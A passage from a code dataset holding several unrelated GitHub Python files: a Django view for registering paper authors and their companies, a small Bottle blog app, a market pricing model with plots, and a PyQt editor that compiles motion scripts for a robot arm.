Author.objects.filter(Q(anamech__startswith=prefix) | Q(anameen__startswith=prefix))[:10]\n result = []\n for author in authors:\n try:\n ac = AuthorCompany.objects.get(author_id=author.aid)\n result.append({\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n 'cnamech1': ac.company.cnamech1,\n 'cnamech2': ac.company.cnamech2,\n 'cnameeg1': ac.company.cnameeg1,\n 'cnameeg2': ac.company.cnameeg2\n })\n except:\n result.append({\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n })\n return HttpResponse(json.dumps(list(result)), content_type=\"application/json\")\n\n\n@csrf_exempt\ndef add_authors(request):\n authors = json.loads(request.body.decode('utf-8'))\n if len(authors) == 0:\n return HttpResponse(json.dumps({'success': False, 'message': '至少添加一位作者'}), content_type=\"application/json\")\n tmp = {}\n for a in authors:\n tmp[a['amail']] = a\n if len(tmp) != len(authors):\n return HttpResponse(json.dumps({'success': False, 'message': '添加了重复的作者'}), content_type=\"application/json\")\n if not util.check_comm(authors):\n return HttpResponse(json.dumps({'success': False, 'message': '通信作者顺序有误'}), content_type=\"application/json\")\n request.session['authors'] = authors\n return HttpResponse(json.dumps({'success': True}), content_type=\"application/json\")\n\n\ndef new_author(request):\n if request.method == 'POST':\n form = AuthorForm(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n try:\n author = Author(\n anamech=values['anamech'],\n anameen=values['anameen'],\n amail=values['amail'],\n )\n author.save()\n except:\n return render(request, 'polls/new-author.html', {\n 'form': form, 'err_msg': '%s已被其他作者占用' % values['amail']})\n\n try:\n company = Company.objects.get(\n cnamech1=values['cnamech1'], cnamech2=values['cnamech2']\n )\n except Company.DoesNotExist:\n company = Company(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameeg1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameeg2'],\n czipcode=values['czipcode'],\n addressch=values['addressch'],\n addressen=values['addressen'],\n )\n company.save()\n ac = AuthorCompany(\n author=author,\n company=company,\n acorder=1,\n accurrent=True,\n )\n ac.save()\n return HttpResponseRedirect(reverse('polls:add_step2'))\n else:\n form = AuthorForm()\n\n return render(request, 'polls/new-author.html', {'form': form})\n\n\ndef new_author_2(request):\n if request.method == 'POST':\n form = AuthorForm2(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n try:\n author = Author(\n anamech=values['alnamech'] + values['afnamech'],\n anameen=values['afnameen'] + ' ' + values['alnameen'],\n alnamech=values['alnamech'],\n afnamech=values['afnamech'],\n alnameen=values['alnameen'],\n afnameen=values['afnameen'],\n amail=values['amail'],\n )\n author.save()\n except:\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': '%s已被其他作者占用' % values['amail']})\n\n if values['country'] == '中国':\n province_no = values['province']\n city_no = values['city']\n area_no = values['area']\n\n if province_no < 0 or province_no >= len(provinces):\n err_msg = '不合法的省份'\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': err_msg})\n province = provinces[province_no]\n\n if city_no < 0 or city_no >= len(province['city']):\n err_msg = '不合法的市'\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': err_msg})\n city = province['city'][city_no]\n\n if area_no < 0 or area_no >= 
len(city['area']):\n                err_msg = '不合法的区县'\n                return render(request, 'polls/new-author.html', {\n                    'data': values, 'err_msg': err_msg})\n            area = city['area'][area_no]\n\n            addressch = province['name'] + city['name'] + area + values['addressch']\n            try:\n                company = Company.objects.get(\n                    cnamech1=values['cnamech1'],\n                    cnameeg1=values['cnameen1'],\n                    cnamech2=values['cnamech2'],\n                    cnameeg2=values['cnameen2'],\n                    czipcode=values['czipcode'],\n                    addressch=addressch,\n                )\n            except Company.DoesNotExist:\n                company = Company(\n                    cnamech1=values['cnamech1'],\n                    cnameeg1=values['cnameen1'],\n                    cnamech2=values['cnamech2'],\n                    cnameeg2=values['cnameen2'],\n                    czipcode=values['czipcode'],\n                    addressch=addressch,\n                )\n                company.save()\n        else:\n            addressen = country_map[values['country']] + ' ' + values['addressen']\n            try:\n                company = Company.objects.get(\n                    cnamech1=values['cnamech1'],\n                    cnameeg1=values['cnameen1'],\n                    cnamech2=values['cnamech2'],\n                    cnameeg2=values['cnameen2'],\n                    czipcode=values['czipcode'],\n                    addressen=addressen,\n                )\n            except Company.DoesNotExist:\n                company = Company(\n                    cnamech1=values['cnamech1'],\n                    cnameeg1=values['cnameen1'],\n                    cnamech2=values['cnamech2'],\n                    cnameeg2=values['cnameen2'],\n                    czipcode=values['czipcode'],\n                    addressen=addressen,\n                )\n                company.save()\n            ac = AuthorCompany(\n                author=author,\n                company=company,\n                acorder=1,\n                accurrent=True,\n            )\n            ac.save()\n\n            return HttpResponseRedirect(reverse('polls:add_step2'))\n        else:\n            return render(request, 'polls/new-author.html', {'data': request.POST, 'err_msg': '信息不完善'})\n    return render(request, 'polls/basic-form.html')\n","repo_name":"PoorKing95/worktest","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71850387321","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport bottle\nfrom bottle import route, view, request, abort, error\nfrom lib.pagination import paginate\nfrom models import Category, Post\n\n\nbottle.TEMPLATE_PATH.append('./templates/')\nSTATIC_ROOT = os.path.join(os.path.dirname(__file__), 'public', 'static')\n\ndef add_categories(func):\n    \"\"\" Adds category list to each func output \"\"\"\n    def wrapper(*args, **kwargs):\n        output = func(*args, **kwargs)\n        if not isinstance(output, dict):\n            return output\n        output.update({'categories': Category.objects().all()})\n        return output\n    return wrapper\n\n\n@route('/')\n@view('index')\n@add_categories\ndef index():\n    \"\"\" Index page controller \"\"\"\n    paginator = paginate(request, Post.objects().filter_by(is_published=True))\n    \n    return {'paginator': paginator}\n\n\n@route('/category/:slug#[\\w-]+#')\n@view('category')\n@add_categories\ndef category(slug):\n    \"\"\" Category page controller \"\"\"\n    category = Category.objects().filter_by(slug=slug).first()\n    if not category:\n        abort(404)\n    paginator = paginate(request, Post.objects().filter_by(is_published=True, \n                                                        category_id=category.id))\n\n    return {'category': category, 'paginator': paginator}\n\n\n@route('/post/:slug#[\\w-]+#')\n@view('post')\n@add_categories\ndef post(slug):\n    \"\"\" Single post controller \"\"\"\n    post = Post.objects().filter_by(slug=slug, is_published=True).first()\n    if not post:\n        abort(404)\n    return {'post': post}\n\n\n@error(404)\ndef error404(error):\n    \"\"\" Error 404 \"\"\"\n    return u'Страница не 
найдена.'\n","repo_name":"kvex/foobar","sub_path":"foobar.py","file_name":"foobar.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29020971861","text":"import matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\nimport constants\nfrom Product import Product\n\n\nk = 0.1 # Curvature constant\n\n\ndef frange(begin, end, step):\n    res = []\n    current = begin\n    while current <= end:\n        res.append(current)\n        current += step\n    return res\n\n\ndef draw_axe(plot, ln):\n    plot.plot([i for i in range(ln)], [0 for i in range(ln)])\n    plot.vlines(0, ln, 0)\n\n\nclass LocalMarket:\n    def __init__(self,\n                 name: str,\n                 population: int, # number of families\n                 richness: int, # wealth in abstract units \n                 dispersy: float,\n                 product): # inequality between population strata\n        self.name = name\n        self.population = population\n        self.richness = richness\n        self.dispersy = dispersy\n        self.product = product\n\n        self._pull = self.product\n        # self._generate_population()\n\n    def generate_cost(self, quantity, raise_factor):\n        B = self.richness * constants.richness_inf\n        S = raise_factor\n        dis = self.dispersy * 2\n        K = dis/self.product.lux\n\n        cost = lambda x: (K/((x + K*k - S*0.5) - K*k + B + S*0.5) * self.population * self.product.consumption * self.product.not_panic_time / 50)*self.product.mid_cost\n\n        x = [i for i in frange(-0.1, 1000, 0.2)]\n        y = [cost(i) for i in frange(-0.1, 1000, 0.2)]\n        plt.plot(x, y)\n        plt.vlines(quantity, 10, 0)\n        plt.show()\n        return cost(quantity)\n\n    def _generate_population(self):\n        # draw_axe(plt, 5)\n        # const\n\n        draw_axe(plt, 8)\n        # params\n        lux = 1.0\n        dis = 1.0\n        S = -0.1\n        B = 0.0\n\n        # raw calculations\n        B = B * constants.richness_inf\n        S *= 0.5\n        dis *= 2\n        K = dis/lux\n        x = [i for i in frange(-0.1, 6, 0.2)]\n        y = [K/(i + K*k - S*0.5) - K*k + B + S*0.5 for i in x]\n\n        # plt.plot(x, y)\n\n        spl = UnivariateSpline(x, y)\n        spl.set_smoothing_factor(0.1)\n        x = [i for i in frange(-0.1, 6, 0.001)]\n\n        plt.plot(x, spl(x))\n\n\n        # params\n        lux = 1.0\n        dis = 1.0\n        S = 0\n        B = 0.0\n        t = 2\n\n        # raw calculations\n        B = B * constants.richness_inf\n        S *= 0.5\n        dis *= 2\n        K = dis/lux\n        x = [i for i in frange(-0.1, 6, 0.2)]\n        y = [(K/(i + K*k - S) - K*k + B + S)*t for i in x]\n\n        # plt.plot(x, y)\n\n        spl = UnivariateSpline(x, y)\n        spl.set_smoothing_factor(0.1)\n        x = [i for i in frange(-0.1, 6, 0.001)]\n\n        plt.plot(x, spl(x), color=\"red\")\n        plt.show()\n\n\ntovar = Product(\"Картофанчик\", 1, 1, 5.0, 0.1, 8)\nmarket = LocalMarket(\"Мухосранск\", 1500, 50, 0.5, tovar)\n\nprint(market.generate_cost(7500, 50))","repo_name":"Magapie/Economy-model","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12135249906","text":"# -*- coding: utf-8 -*-\r\nimport sys, logging\r\nfrom PyQt5.QtWidgets import QWidget, QFileDialog, QTableWidgetItem\r\nfrom PyQt5.QtCore import QFileInfo, pyqtSlot, pyqtSignal, Qt\r\nfrom ui.frmScriptEditorUi import *\r\nfrom AxRobotData import *\r\n\r\nlogging.basicConfig(stream=sys.stdout)\r\nlog = logging.getLogger(__name__)\r\n\r\n# Sharing data\r\nRunScriptStateDef = {\r\n    \"Run\" : 1,\r\n    \"Stop\" : 2,\r\n    \"Pause\": 3,\r\n}\r\n\r\nclass frmScriptEditor(QWidget, Ui_Form):\r\n    sigEventHandler = pyqtSignal(dict)\r\n    sigScriptProcess = pyqtSignal(list)\r\n\r\n    def __init__(self, MotionCtrl, parent=None):\r\n        
super(frmScriptEditor, self).__init__(parent)\r\n\r\n # Init object point\r\n self.MotionCtrl = MotionCtrl\r\n self.MotionData = MotionCtrl.MotionData\r\n\r\n # Init normal data\r\n self.CompiledScriptLines = list()\r\n self.lstScriptLines = list()\r\n self.RunScriptState = RunScriptStateDef[\"Stop\"]\r\n self.DefaultSpeed = 0\r\n\r\n # Set logger level\r\n log.setLevel(self.MotionData.GetLogLevel())\r\n\r\n # Init UI components\r\n self.setupUi(self)\r\n self.cboDefaultSpeed.addItems([\"10\",\"50\",\"100\",\"200\",\"300\"])\r\n self.cboDefaultSpeed.setCurrentText(\"100\")\r\n\r\n # Connect signal&slot paire\r\n self.sigEventHandler.connect(self.sltEventHandler)# Establish internal event handling connectoin\r\n self.sigScriptProcess.connect(self.MotionCtrl.sltScriptProcess)# Establish ScriptProcess connection\r\n \"\"\"\r\n self.tblScriptEditor.itemActivated.connect(self.sltTableHandler)\r\n \"\"\"\r\n self.tblScriptEditor.itemClicked.connect(self.sltTableHandler)\r\n# self.tblScriptEditor.itemChanged.connect(self.sltTableHandler)\r\n \"\"\"\r\n self.tblScriptEditor.itemDoubleClicked.connect(self.sltTableHandler)\r\n self.tblScriptEditor.itemPressed.connect(self.sltTableHandler)\r\n self.tblScriptEditor.itemEntered.connect(self.sltTableHandler)\r\n \"\"\"\r\n# self.tblScriptEditor.cellActivated.connect(self.sltCellHandler)\r\n self.tblScriptEditor.cellChanged.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellClicked.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellDoubleClicked.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellEntered.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellPressed.connect(self.sltCellHandler)\r\n\r\n self.btnCompile.clicked.connect(self.sltPushButtonHandler)\r\n self.btnRun.clicked.connect(self.sltPushButtonHandler)\r\n self.btnRemoveLine.clicked.connect(self.sltPushButtonHandler)\r\n self.btnClearAll.clicked.connect(self.sltPushButtonHandler)\r\n self.btnLoadScriptFromFile.clicked.connect(self.sltPushButtonHandler)\r\n self.btnSaveScriptToFile.clicked.connect(self.sltPushButtonHandler)\r\n\r\n\r\n # Init ScriptEditor behavior\r\n hdr = self.tblScriptEditor.horizontalHeader()\r\n hdr.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\r\n self.tblScriptEditor.setShowGrid(False)\r\n self.tblScriptEditor.setSelectionBehavior(self.tblScriptEditor.SelectRows)\r\n \"\"\"\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.NoEditTriggers \\\r\n | self.tblScriptEditor.AnyKeyPressed \\\r\n | self.tblScriptEditor.CurrentChanged \\\r\n | self.tblScriptEditor.DoubleClicked \\\r\n | self.tblScriptEditor.EditKeyPressed \\\r\n | self.tblScriptEditor.SelectedClicked \\\r\n )\r\n \"\"\"\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.AllEditTriggers)\r\n# self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.SingleSelection)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.NoSelection)\r\n\r\n # Init GUI status\r\n self.sigEventHandler.emit({\"ClearAll\":[\"\"]})\r\n\r\n def sltCellHandler(self, r, c):\r\n global RunScriptState\r\n # log.debug(\"cell event @%d/%d, RunScriptState=%s\\r\\n\", r, c, self.RunScriptState)\r\n if self.RunScriptState == RunScriptStateDef[\"Stop\"]:\r\n self.sigEventHandler.emit({\"Uncompiled\":[\"\"]})\r\n\r\n def sltTableHandler(self, item):\r\n global RunScriptStateDef\r\n log.debug(\"table event @%s\\r\\n\", str(item))\r\n if self.RunScriptState == RunScriptStateDef[\"Pause\"]:\r\n self.sigEventHandler.emit({\"Continue\":[\"\"]})\r\n else:\r\n 
self.sigEventHandler.emit({\"Pause\":[\"\"]})\r\n\r\n # def ItemkeyPressEvent(self, event):\r\n # log.debug(\"Item key press event @%s\\r\\n\", str(event.key()))\r\n\r\n # # Delete selected empty row\r\n # if event.key() == Qt.Key_Backspace:\r\n # row = self.tblScriptEditor.currentRow()\r\n # if row>=0 and self.tblScriptEditor.item(row, 0).text() == \"\":\r\n # self.tblScriptEditor.removeRow(row)\r\n # log.debug(\"Delete selected empty row2 %s\\r\\n\", row)\r\n\r\n # super(QTableWidgetItem, self).keyPressEvent(event)\r\n\r\n def keyPressEvent(self, event):\r\n log.debug(\"key press event @%s\\r\\n\", str(event.key()))\r\n\r\n # Append new row\r\n if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:\r\n self.sigEventHandler.emit({\"InsertNewLine\":[\"\"]})\r\n\r\n # Delete selected empty row\r\n elif event.key() == Qt.Key_Backspace:\r\n self.sigEventHandler.emit({\"RemoveSpaceLine\":[\"\"]})\r\n\r\n super(frmScriptEditor, self).keyPressEvent(event)\r\n\r\n def SetGuiStatus(self, event):\r\n if event == \"Run\":\r\n self.btnCompile.setEnabled(False)\r\n self.btnRun.setEnabled(True)\r\n self.btnClearAll.setEnabled(False)\r\n self.btnRemoveLine.setEnabled(False)\r\n self.btnLoadScriptFromFile.setEnabled(False)\r\n self.btnSaveScriptToFile.setEnabled(False)\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.NoEditTriggers)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.NoSelection)\r\n if self.tblScriptEditor.currentItem() != None:\r\n self.tblScriptEditor.currentItem().setSelected(False)\r\n self.btnRun.setText(\"Cancel\")\r\n self.cboDefaultSpeed.setEnabled(False)\r\n elif event == \"Ready\":\r\n self.btnCompile.setEnabled(True)\r\n self.btnRun.setEnabled(True)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(True)\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.AllEditTriggers)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.SingleSelection)\r\n self.btnRun.setText(\"Run\")\r\n self.cboDefaultSpeed.setEnabled(True)\r\n elif event == \"Uncompiled\":\r\n self.btnCompile.setEnabled(True)\r\n self.btnRun.setEnabled(False)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(True)\r\n self.cboDefaultSpeed.setEnabled(True)\r\n elif event == \"ClearAll\":\r\n self.btnCompile.setEnabled(False)\r\n self.btnRun.setEnabled(False)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(False)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.cboDefaultSpeed.setEnabled(True)\r\n\r\n @pyqtSlot()\r\n def sltPushButtonHandler(self):\r\n btn = self.sender()\r\n if btn.objectName() == \"btnCompile\":\r\n self.sigEventHandler.emit({\"Compile\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnRun\":\r\n if btn.text() == \"Run\":\r\n self.sigEventHandler.emit({\"Run\":[\"\"]})\r\n elif btn.text() == \"Cancel\":\r\n self.sigEventHandler.emit({\"Cancel\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnRemoveLine\":\r\n self.sigEventHandler.emit({\"RemoveSelectedLine\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnClearAll\":\r\n self.sigEventHandler.emit({\"ClearAll\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnLoadScriptFromFile\":\r\n self.sigEventHandler.emit({\"LoadScriptFromFile\":[\"\"]})\r\n\r\n elif btn.objectName() == 
\"btnSaveScriptToFile\":\r\n self.sigEventHandler.emit({\"SaveScriptToFile\":[\"\"]})\r\n\r\n @pyqtSlot(dict)\r\n def sltEventHandler(self, dctEvents):\r\n global RunScriptStateDef\r\n for k, v in dctEvents.items():\r\n if k != \"SetRowColor\":\r\n log.debug(\"RxEvent:%s, %s\\r\\n\", k, str(v))# For debug only\r\n\r\n if k == \"Compile\":\r\n if self.tblScriptEditor.rowCount() == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Script editor is empty\"]})\r\n else:\r\n self.lstScriptLines = self.ConvertScriptEditorToList()\r\n result, self.CompiledScriptLines, UnRecogLines = self.CompileScript(self.lstScriptLines)\r\n if result < 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Error\",\"Unrecognized commands @lines: {}\".format(UnRecogLines)]})\r\n else:\r\n self.SetGuiStatus(\"Ready\")\r\n\r\n elif k == \"Run\":\r\n if self.tblScriptEditor.rowCount() == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Script editor is empty\"]})\r\n elif len(self.CompiledScriptLines) <= 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Please compile the script before running\"]})\r\n else:\r\n self.RunScriptState = RunScriptStateDef[\"Run\"]\r\n self.SetGuiStatus(k)\r\n # Get default speed setting\r\n self.DefaultSpeed = int(self.cboDefaultSpeed.currentText())\r\n self.sigScriptProcess.emit(self.CompiledScriptLines)\r\n\r\n elif k == \"Ready\" or k == \"Cancel\":\r\n self.RunScriptState = RunScriptStateDef[\"Stop\"]\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"Uncompiled\":\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"Pause\":\r\n self.RunScriptState = RunScriptStateDef[\"Pause\"]\r\n\r\n elif k == \"Continue\":\r\n self.RunScriptState = RunScriptStateDef[\"Run\"]\r\n\r\n elif k == \"ClearAll\":\r\n self.ClearAllRows()\r\n # Clear compiled script\r\n self.CompiledScriptLines.clear()\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"LoadScriptFromFile\":\r\n # Convert script editor to list form\r\n self.lstScriptLines, Result = self.LoadScriptFromFile()\r\n if Result == 0:\r\n self.ConvertListToScriptEditor(self.lstScriptLines, 1)\r\n self.SetGuiStatus(\"Uncompiled\")\r\n\r\n elif k == \"SaveScriptToFile\":\r\n self.lstScriptLines = self.ConvertScriptEditorToList()\r\n\r\n # Check empty script\r\n if len(self.lstScriptLines) == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Cannot save as empty script file\"]})\r\n # Save to script file\r\n else:\r\n self.SaveScriptToFile(self.lstScriptLines)\r\n\r\n elif k == \"SetRowColor\":\r\n self.tblScriptEditor.item(v[0], 0).setBackground(v[1])\r\n\r\n elif k == \"InsertNewLine\":\r\n self.InsertNewLine()\r\n\r\n elif k == \"RemoveSelectedLine\":\r\n self.RemoveSelectedLine()\r\n\r\n def InsertNewLine(self):\r\n row = self.tblScriptEditor.currentRow()+1\r\n self.tblScriptEditor.insertRow(row)\r\n self.tblScriptEditor.setItem(row, 0, QTableWidgetItem(\"\"))\r\n # self.tblScriptEditor.setCurrentItem(self.tblScriptEditor.item(row,0))\r\n # self.tblScriptEditor.item(row,0).setBackground(QtGui.QColor(222, 225, 227))\r\n self.tblScriptEditor.editItem(self.tblScriptEditor.item(row,0))\r\n log.debug(\"Append new row %s\\r\\n\", row)\r\n\r\n def RemoveSelectedLine(self):\r\n log.debug(\"RemoveSelectedLine: %d\\r\\n\", self.tblScriptEditor.currentRow())\r\n self.tblScriptEditor.removeRow(self.tblScriptEditor.currentRow())\r\n\r\n\r\n def RemoveSpaceLine(self):\r\n row = 
self.tblScriptEditor.currentRow()\r\n        if row>=0 and self.tblScriptEditor.item(row, 0).text() == \"\":\r\n            self.tblScriptEditor.removeRow(row)\r\n            log.debug(\"RemoveSpaceLine: %d\\r\\n\", row)\r\n\r\n    def GetRunScriptState(self):\r\n        return self.RunScriptState\r\n\r\n    def ClearAllRows(self):\r\n        # Clear all rows\r\n        while self.tblScriptEditor.rowCount():\r\n            self.tblScriptEditor.removeRow(0)\r\n        \r\n        # # Reserved one row\r\n        # self.tblScriptEditor.insertRow(0)\r\n        # self.tblScriptEditor.setItem(0, 0, QTableWidgetItem(\"\"))\r\n\r\n    def ConvertListToScriptEditor(self, lstScriptLines, IsOverWrite):\r\n        if IsOverWrite:\r\n            # Clear all rows\r\n            while self.tblScriptEditor.rowCount():\r\n                self.tblScriptEditor.removeRow(0)\r\n\r\n        # Append rows\r\n        row = self.tblScriptEditor.rowCount()\r\n        for line in lstScriptLines:\r\n            self.tblScriptEditor.insertRow(row)\r\n            self.tblScriptEditor.setItem(row, 0, QTableWidgetItem(str(line)))\r\n            log.debug(\"ConvertListToScriptEditor: insertRow[%s]: %s\\r\\n\", str(row), line)\r\n            row += 1\r\n\r\n    def ConvertScriptEditorToList(self):\r\n        lstScriptLines = list()\r\n        for row in range(self.tblScriptEditor.rowCount()):\r\n            lstScriptLines.append(self.tblScriptEditor.item(row,0).text())\r\n        log.debug(\"ConvertScriptEditorToList:%s, %d\\r\\n\", str(lstScriptLines), len(lstScriptLines))\r\n        return lstScriptLines\r\n\r\n    #############################################################\r\n    # General format : [strCmd, strParam0, strParam1..strParamN]\r\n    # Move joint command : [\"MOVJNT\", \"J1=90\", \"J2=30\", \"J7=80\", \"SPD=100\", \"ACC=100\"]\r\n    # Move point command : [\"MOVPT\", \"P1\", \"P3\", \"P2, P1\", \"SPD=100\", \"ACC=100\"]\r\n    # Move line command : [\"MOVLN\", \"P1\", \"P2\", \"P3\", \"SPD=100\", \"ACC=100\"]\r\n    # Delay command(ms) : [\"DELAY\", \"10\"]\r\n    # Loop command(ms) : [\"LOOP\", \"10\"], [\"ENDLOOP\"]\r\n    # Comment : [\"#\", \"comment description\"]\r\n    #############################################################\r\n    def CompileScript(self, lstScriptLines):\r\n        Result = -1\r\n        CompiledScriptLines = list()\r\n\r\n        # Check empty script\r\n        if len(lstScriptLines) == 0:\r\n            return Result, CompiledScriptLines\r\n        \r\n        LoopCmdStack = list()\r\n        UnrecognizedLines = list()\r\n        UnrecognizedLines.clear()\r\n\r\n        # Parsing each command line\r\n        for ln in range(len(lstScriptLines)):\r\n            # Convert to upper case\r\n            line = lstScriptLines[ln].upper()\r\n\r\n            # Split into fields\r\n            fields = line.split()\r\n\r\n            # Skip empty line\r\n            if len(fields) == 0:\r\n                continue\r\n\r\n            for fn in range(len(fields)):\r\n                fields[fn].strip()\r\n\r\n            # Parsing each fields\r\n            if fields[0] == \"MOVJNT\":\r\n                # Check parameter\r\n                if len(fields[1:]) != 0:\r\n                    for fn in range(1,len(fields)):\r\n                        subfields = fields[fn].split(\"=\")\r\n                        if fields[fn][0] == \"#\":# Ignore comment\r\n                            fields = fields[:fn]\r\n                            break\r\n                        elif len(subfields) == 2:# Check subfields\r\n                            if (len(subfields[0])>1) and subfields[0][0] == \"J\":# Get joint number\r\n                                # Joint number and angle limitation\r\n                                if int(subfields[0][1:]) <= 8 and abs(int(subfields[1])) <= 180:\r\n                                    continue\r\n                            elif subfields[0] == \"SPD\":# Get specified speed\r\n                                # Speed limitation\r\n                                if abs(int(subfields[1])) <= 1000:\r\n                                    continue\r\n                            elif subfields[0] == \"ACC\":# Get specified acceleration\r\n                                # Acceleration limitation\r\n                                if abs(int(subfields[1])) <= 1000:\r\n                                    continue\r\n                        UnrecognizedLines.append(ln+1)\r\n                        break\r\n                else:\r\n                    UnrecognizedLines.append(ln+1)\r\n\r\n            elif fields[0] == \"MOVPT\" or fields[0] == \"MOVLN\":\r\n                # Check 
parameter\r\n if len(fields[1:]) != 0:\r\n for fn in range(1,len(fields)):\r\n subfields = fields[fn].split(\"=\")\r\n if fields[fn][0] == \"#\":# Ignore comment\r\n fields = fields[:fn]\r\n break\r\n elif len(subfields) == 1:\r\n if self.CheckPointExist(fields[fn]) == True:# Check point name\r\n continue\r\n elif len(subfields) == 2:# Check subfields\r\n if subfields[0] == \"SPD\":# Get specified speed\r\n # Speed limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n elif subfields[0] == \"ACC\":# Get specified acceleration\r\n # Acceleration limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n UnrecognizedLines.append(ln+1)\r\n break\r\n else:\r\n UnrecognizedLines.append(ln+1)\r\n\r\n elif fields[0] == \"DELAY\":\r\n # Check parameter\r\n if len(fields) < 2 or fields[1].isnumeric() == False:\r\n UnrecognizedLines.append(ln+1)\r\n elif len(fields) > 2 and fields[2][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n fields[1] = int(fields[1])\r\n # Cut off useless part\r\n fields = fields[:2]\r\n\r\n elif fields[0] == \"LOOP\":\r\n # Check parameter\r\n if len(fields) < 2 or fields[1].isnumeric() == False:\r\n UnrecognizedLines.append(ln+1)\r\n elif len(fields) > 2 and fields[2][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n # Cut off useless part\r\n fields = fields[:2]\r\n\r\n # Push loop count and line number into stack\r\n LoopCmdStack.append([fields[1], ln])\r\n fields[1] = int(fields[1])\r\n fields.append(0)# Append fields[2] to save \"LOOPEND\" line number\r\n\r\n elif fields[0] == \"LOOPEND\":\r\n # Check parameter\r\n if len(fields) > 1 and fields[1][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n # Cut off useless part\r\n fields = fields[:1]\r\n\r\n # Pop loop count and line number into stack\r\n fields.append(int(LoopCmdStack[len(LoopCmdStack)-1][0]))#loop count\r\n fields.append(int(LoopCmdStack[len(LoopCmdStack)-1][1]))#loop start line\r\n LoopCmdStack.pop(len(LoopCmdStack)-1)\r\n\r\n # Save back LOOPEND line\r\n CompiledScriptLines[fields[2]][2] = ln\r\n\r\n elif fields[0][0] == \"#\":\r\n pass\r\n\r\n else:\r\n UnrecognizedLines.append(ln+1)\r\n log.debug(\"Compiled line[%d]: cmd=%s, param=%s\\r\\n\", ln+1, fields[0], str(fields[1:]))\r\n\r\n CompiledScriptLines.append(fields)\r\n # End of lines parsing\r\n\r\n # Check LOOP command paires\r\n if len(LoopCmdStack) != 0:\r\n UnrecognizedLines.append(int(LoopCmdStack[0][0])+1)\r\n log.debug(\"Non-emptied LoopCmdStack[]: %s\\r\\n\", str(LoopCmdStack))\r\n\r\n if len(UnrecognizedLines) == 0:\r\n Result = 0\r\n else:\r\n CompiledScriptLines.clear()\r\n\r\n return Result, CompiledScriptLines, UnrecognizedLines\r\n\r\n def LoadScriptFromFile(self):\r\n Result = -1\r\n lstScriptLines = list()\r\n opt = QFileDialog.Options()\r\n opt |= QFileDialog.DontUseNativeDialog\r\n try:\r\n filePath, _ = QFileDialog.getOpenFileName(self, \\\r\n \"Load Script From File\", \\\r\n dctAPP_CFIG[\"SCRIPT_PATH\"], \\\r\n \"motion script file (*.ms)\", \\\r\n options=opt)\r\n\r\n fileName = QFileInfo(filePath).fileName().split(\".\")\r\n log.debug(\"Load from filePath:%s, fileName:%s\\r\\n\", filePath, fileName)\r\n if filePath != \"\" and fileName != \"\":\r\n if len(fileName) < 2:\r\n filePath += \".ms\"\r\n f = open(filePath, \"r\")\r\n # Remove non-printable characters\r\n lstScriptLines = self.FilterOutNonPrintableChar(f.readlines())\r\n 